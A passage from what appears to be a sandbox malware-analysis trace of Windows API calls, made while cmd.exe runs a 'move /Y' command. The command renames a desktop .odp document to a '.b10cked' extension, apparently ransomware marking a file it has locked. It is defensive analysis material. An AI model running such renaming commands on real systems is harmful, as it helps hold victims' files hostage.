34563 start_va = 0x80000 end_va = 0x80fff entry_point = 0x0 region_type = private name = "private_0x0000000000080000" filename = "" Region: id = 34564 start_va = 0x470000 end_va = 0x570fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 34565 start_va = 0x580000 end_va = 0x117ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 34566 start_va = 0x1180000 end_va = 0x12e2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001180000" filename = "" Thread: id = 849 os_tid = 0x234 [0231.807] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fe7c | out: lpSystemTimeAsFileTime=0x18fe7c*(dwLowDateTime=0xbdb83620, dwHighDateTime=0x1d440a9)) [0231.807] GetCurrentProcessId () returned 0x910 [0231.807] GetCurrentThreadId () returned 0x234 [0231.807] GetTickCount () returned 0x3fc96 [0231.807] QueryPerformanceCounter (in: lpPerformanceCount=0x18fe74 | out: lpPerformanceCount=0x18fe74*=28859876988) returned 1 [0231.813] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0231.813] __set_app_type (_Type=0x1) [0231.813] __p__fmode () returned 0x76b331f4 [0231.813] __p__commode () returned 0x76b331fc [0231.813] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0231.813] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0231.813] GetCurrentThreadId () returned 0x234 [0231.813] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x234) returned 0x38 [0231.813] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0231.813] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0231.813] SetThreadUILanguage (LangId=0x0) returned 0x409 [0231.814] HeapSetInformation (HeapHandle=0x0, 
HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0231.814] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x18fe0c | out: phkResult=0x18fe0c*=0x0) returned 0x2 [0231.814] VirtualQuery (in: lpAddress=0x18fe43, lpBuffer=0x18fddc, dwLength=0x1c | out: lpBuffer=0x18fddc*(BaseAddress=0x18f000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0231.814] VirtualQuery (in: lpAddress=0x90000, lpBuffer=0x18fddc, dwLength=0x1c | out: lpBuffer=0x18fddc*(BaseAddress=0x90000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0231.814] VirtualQuery (in: lpAddress=0x91000, lpBuffer=0x18fddc, dwLength=0x1c | out: lpBuffer=0x18fddc*(BaseAddress=0x91000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0231.814] VirtualQuery (in: lpAddress=0x93000, lpBuffer=0x18fddc, dwLength=0x1c | out: lpBuffer=0x18fddc*(BaseAddress=0x93000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0231.814] VirtualQuery (in: lpAddress=0x190000, lpBuffer=0x18fddc, dwLength=0x1c | out: lpBuffer=0x18fddc*(BaseAddress=0x190000, AllocationBase=0x190000, AllocationProtect=0x2, RegionSize=0x67000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0231.815] GetConsoleOutputCP () returned 0x1b5 [0231.815] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0231.815] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0231.815] _get_osfhandle (_FileHandle=1) returned 0x7 [0231.815] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0231.816] _get_osfhandle (_FileHandle=1) returned 0x7 [0231.816] GetConsoleMode (in: 
hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0231.817] _get_osfhandle (_FileHandle=1) returned 0x7 [0231.817] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0231.817] _get_osfhandle (_FileHandle=0) returned 0x3 [0231.817] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0231.818] _get_osfhandle (_FileHandle=0) returned 0x3 [0231.818] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0231.822] GetEnvironmentStringsW () returned 0x380178* [0231.822] FreeEnvironmentStringsW (penv=0x380178) returned 1 [0231.822] GetEnvironmentStringsW () returned 0x380178* [0231.822] FreeEnvironmentStringsW (penv=0x380178) returned 1 [0231.822] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x18ed7c | out: phkResult=0x18ed7c*=0x40) returned 0x0 [0231.822] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x18ed84, lpData=0x18ed88, lpcbData=0x18ed80*=0x1000 | out: lpType=0x18ed84*=0x0, lpData=0x18ed88*=0xa0, lpcbData=0x18ed80*=0x1000) returned 0x2 [0231.822] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x18ed84, lpData=0x18ed88, lpcbData=0x18ed80*=0x1000 | out: lpType=0x18ed84*=0x4, lpData=0x18ed88*=0x1, lpcbData=0x18ed80*=0x4) returned 0x0 [0231.822] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x18ed84, lpData=0x18ed88, lpcbData=0x18ed80*=0x1000 | out: lpType=0x18ed84*=0x0, lpData=0x18ed88*=0x1, lpcbData=0x18ed80*=0x1000) returned 0x2 [0231.823] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x18ed84, lpData=0x18ed88, lpcbData=0x18ed80*=0x1000 | out: lpType=0x18ed84*=0x4, lpData=0x18ed88*=0x0, lpcbData=0x18ed80*=0x4) returned 0x0 [0231.823] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x18ed84, 
lpData=0x18ed88, lpcbData=0x18ed80*=0x1000 | out: lpType=0x18ed84*=0x4, lpData=0x18ed88*=0x40, lpcbData=0x18ed80*=0x4) returned 0x0 [0231.823] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x18ed84, lpData=0x18ed88, lpcbData=0x18ed80*=0x1000 | out: lpType=0x18ed84*=0x4, lpData=0x18ed88*=0x40, lpcbData=0x18ed80*=0x4) returned 0x0 [0231.823] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x18ed84, lpData=0x18ed88, lpcbData=0x18ed80*=0x1000 | out: lpType=0x18ed84*=0x0, lpData=0x18ed88*=0x40, lpcbData=0x18ed80*=0x1000) returned 0x2 [0231.823] RegCloseKey (hKey=0x40) returned 0x0 [0231.823] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x18ed7c | out: phkResult=0x18ed7c*=0x40) returned 0x0 [0231.823] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x18ed84, lpData=0x18ed88, lpcbData=0x18ed80*=0x1000 | out: lpType=0x18ed84*=0x0, lpData=0x18ed88*=0x40, lpcbData=0x18ed80*=0x1000) returned 0x2 [0231.823] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x18ed84, lpData=0x18ed88, lpcbData=0x18ed80*=0x1000 | out: lpType=0x18ed84*=0x4, lpData=0x18ed88*=0x1, lpcbData=0x18ed80*=0x4) returned 0x0 [0231.823] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x18ed84, lpData=0x18ed88, lpcbData=0x18ed80*=0x1000 | out: lpType=0x18ed84*=0x0, lpData=0x18ed88*=0x1, lpcbData=0x18ed80*=0x1000) returned 0x2 [0231.823] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x18ed84, lpData=0x18ed88, lpcbData=0x18ed80*=0x1000 | out: lpType=0x18ed84*=0x4, lpData=0x18ed88*=0x0, lpcbData=0x18ed80*=0x4) returned 0x0 [0231.823] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x18ed84, lpData=0x18ed88, lpcbData=0x18ed80*=0x1000 | out: lpType=0x18ed84*=0x4, 
lpData=0x18ed88*=0x9, lpcbData=0x18ed80*=0x4) returned 0x0 [0231.823] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x18ed84, lpData=0x18ed88, lpcbData=0x18ed80*=0x1000 | out: lpType=0x18ed84*=0x4, lpData=0x18ed88*=0x9, lpcbData=0x18ed80*=0x4) returned 0x0 [0231.823] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x18ed84, lpData=0x18ed88, lpcbData=0x18ed80*=0x1000 | out: lpType=0x18ed84*=0x0, lpData=0x18ed88*=0x9, lpcbData=0x18ed80*=0x1000) returned 0x2 [0231.823] RegCloseKey (hKey=0x40) returned 0x0 [0231.823] time (in: timer=0x0 | out: timer=0x0) returned 0x5b8863bf [0231.823] srand (_Seed=0x5b8863bf) [0231.823] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Desktop\\SXGPQH~1.ODP\" \"C:\\Users\\EEBsYm5\\Desktop\\SXGpQHv i4OFxmN5_1.odp.b10cked\"" [0231.823] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Desktop\\SXGPQH~1.ODP\" \"C:\\Users\\EEBsYm5\\Desktop\\SXGpQHv i4OFxmN5_1.odp.b10cked\"" [0231.824] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0231.824] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x3818d8, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0231.824] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0231.824] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0231.824] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0231.824] _wcsicmp (_String1="PROMPT", 
_String2="CD") returned 13 [0231.824] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0231.824] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0231.824] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0231.824] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0231.824] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0231.824] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0231.824] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0231.824] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0231.825] GetEnvironmentStringsW () returned 0x3822c8* [0231.825] FreeEnvironmentStringsW (penv=0x3822c8) returned 1 [0231.825] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0231.825] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0231.825] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0231.825] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0231.825] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0231.825] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0231.825] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0231.825] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0231.825] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0231.825] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0232.330] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x18fb48 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0232.330] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x18fb48, lpFilePart=0x18fb44 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x18fb44*="Desktop") returned 0x18 [0232.330] GetFileAttributesW 
(lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0232.330] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x18f8c4 | out: lpFindFileData=0x18f8c4) returned 0x380008 [0232.330] FindClose (in: hFindFile=0x380008 | out: hFindFile=0x380008) returned 1 [0232.330] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x18f8c4 | out: lpFindFileData=0x18f8c4) returned 0x380008 [0232.331] FindClose (in: hFindFile=0x380008 | out: hFindFile=0x380008) returned 1 [0232.331] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x18f8c4 | out: lpFindFileData=0x18f8c4) returned 0x380008 [0232.331] FindClose (in: hFindFile=0x380008 | out: hFindFile=0x380008) returned 1 [0232.331] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0232.331] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0232.331] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0232.331] GetEnvironmentStringsW () returned 0x382ae8* [0232.331] FreeEnvironmentStringsW (penv=0x382ae8) returned 1 [0232.331] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0232.332] GetConsoleOutputCP () returned 0x1b5 [0232.332] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0232.332] GetUserDefaultLCID () returned 0x409 [0232.332] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0232.333] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x18fc88, cchData=128 | out: lpLCData="0") returned 2 [0232.333] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x18fc88, cchData=128 | out: lpLCData="0") returned 2 [0232.333] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, 
lpLCData=0x18fc88, cchData=128 | out: lpLCData="1") returned 2 [0232.333] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0232.333] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0232.333] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0232.333] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0232.333] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0232.333] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0232.333] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0232.333] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0232.333] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0232.333] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0232.333] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0232.334] GetConsoleTitleW (in: lpConsoleTitle=0x3708d8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0232.334] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0232.334] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0232.335] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0232.335] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0232.335] _wcsicmp (_String1="move", _String2=")") returned 68 [0232.335] _wcsicmp (_String1="FOR", 
_String2="move") returned -7 [0232.336] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0232.336] _wcsicmp (_String1="IF", _String2="move") returned -4 [0232.336] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0232.336] _wcsicmp (_String1="REM", _String2="move") returned 5 [0232.336] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0232.339] GetConsoleTitleW (in: lpConsoleTitle=0x18f980, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0232.339] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0232.339] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0232.339] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0232.339] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0232.339] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0232.339] _wcsicmp (_String1="move", _String2="CD") returned 10 [0232.339] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0232.339] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0232.339] _wcsicmp (_String1="move", _String2="REN") returned -5 [0232.339] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0232.339] _wcsicmp (_String1="move", _String2="SET") returned -6 [0232.339] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0232.339] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0232.339] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0232.340] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0232.340] _wcsicmp (_String1="move", _String2="MD") returned 11 [0232.340] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0232.340] _wcsicmp (_String1="move", _String2="RD") returned -5 [0232.340] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0232.340] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0232.340] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0232.340] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0232.340] _wcsicmp 
(_String1="move", _String2="CLS") returned 10 [0232.340] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0232.340] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0232.340] _wcsicmp (_String1="move", _String2="VER") returned -9 [0232.340] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0232.340] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0232.340] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0232.340] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0232.340] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0232.340] _wcsicmp (_String1="move", _String2="START") returned -6 [0232.340] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0232.340] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0232.340] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0232.342] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0232.342] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0232.342] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x18f73c, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x18f734, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x18f734*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0232.343] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0232.343] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0232.343] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0232.343] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0232.343] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0232.343] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0232.343] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", 
_MaxCount=0x7) returned -3 [0232.343] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0232.343] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0232.343] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0232.343] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0232.343] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0232.343] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0232.343] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0232.343] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0232.343] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0232.343] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0232.343] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0232.343] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0232.343] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0232.343] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0232.343] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0232.343] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0232.343] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0232.343] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0232.343] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0232.343] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0232.343] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0232.343] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned 
-18 [0232.343] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0232.343] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0232.344] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0232.344] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0232.344] _wcsicmp (_String1="SXGPQH~1.ODP", _String2=".") returned 69 [0232.344] _wcsicmp (_String1="SXGPQH~1.ODP", _String2="..") returned 69 [0232.344] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\SXGPQH~1.ODP" (normalized: "c:\\users\\eebsym5\\desktop\\sxgpqh~1.odp")) returned 0x20 [0232.344] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x381e30 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0232.344] SetErrorMode (uMode=0x0) returned 0x0 [0232.344] SetErrorMode (uMode=0x1) returned 0x0 [0232.345] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\SXGPQH~1.ODP", nBufferLength=0x104, lpBuffer=0x18f0c4, lpFilePart=0x18f0ac | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\SXGPQH~1.ODP", lpFilePart=0x18f0ac*="SXGPQH~1.ODP") returned 0x25 [0232.345] SetErrorMode (uMode=0x0) returned 0x1 [0232.345] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0232.345] _wcsicmp (_String1="SXGPQH~1.ODP", _String2=".") returned 69 [0232.345] _wcsicmp (_String1="SXGPQH~1.ODP", _String2="..") returned 69 [0232.345] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\SXGPQH~1.ODP" (normalized: "c:\\users\\eebsym5\\desktop\\sxgpqh~1.odp")) returned 0x20 [0232.345] SetErrorMode (uMode=0x0) returned 0x0 [0232.345] SetErrorMode (uMode=0x1) returned 0x0 [0232.345] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\SXGPQH~1.ODP", nBufferLength=0x104, lpBuffer=0x18f540, lpFilePart=0x18f2d8 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\SXGPQH~1.ODP", lpFilePart=0x18f2d8*="SXGPQH~1.ODP") returned 0x25 
[0232.345] SetErrorMode (uMode=0x0) returned 0x1 [0232.345] SetErrorMode (uMode=0x0) returned 0x0 [0232.345] SetErrorMode (uMode=0x1) returned 0x0 [0232.345] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\SXGpQHv i4OFxmN5_1.odp.b10cked", nBufferLength=0x104, lpBuffer=0x18f748, lpFilePart=0x18f2d8 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\SXGpQHv i4OFxmN5_1.odp.b10cked", lpFilePart=0x18f2d8*="SXGpQHv i4OFxmN5_1.odp.b10cked") returned 0x37 [0232.345] SetErrorMode (uMode=0x0) returned 0x1 [0232.345] SetLastError (dwErrCode=0x0) [0232.346] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\SXGpQHv i4OFxmN5_1.odp.b10cked" (normalized: "c:\\users\\eebsym5\\desktop\\sxgpqhv i4ofxmn5_1.odp.b10cked")) returned 0xffffffff [0232.346] GetLastError () returned 0x2 [0232.346] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\SXGPQH~1.ODP", fInfoLevelId=0x1, lpFindFileData=0x18ec54, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18ec54) returned 0x370e50 [0232.346] FindNextFileW (in: hFindFile=0x370e50, lpFindFileData=0x18ec54 | out: lpFindFileData=0x18ec54) returned 0 [0232.346] GetLastError () returned 0x12 [0232.346] FindClose (in: hFindFile=0x370e50 | out: hFindFile=0x370e50) returned 1 [0232.347] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\SXGPQH~1.ODP", fInfoLevelId=0x1, lpFindFileData=0x381bd0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x381bd0) returned 0x370e50 [0232.348] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\SXGpQHv i4OFxmN5_1.odp.b10cked", nBufferLength=0x104, 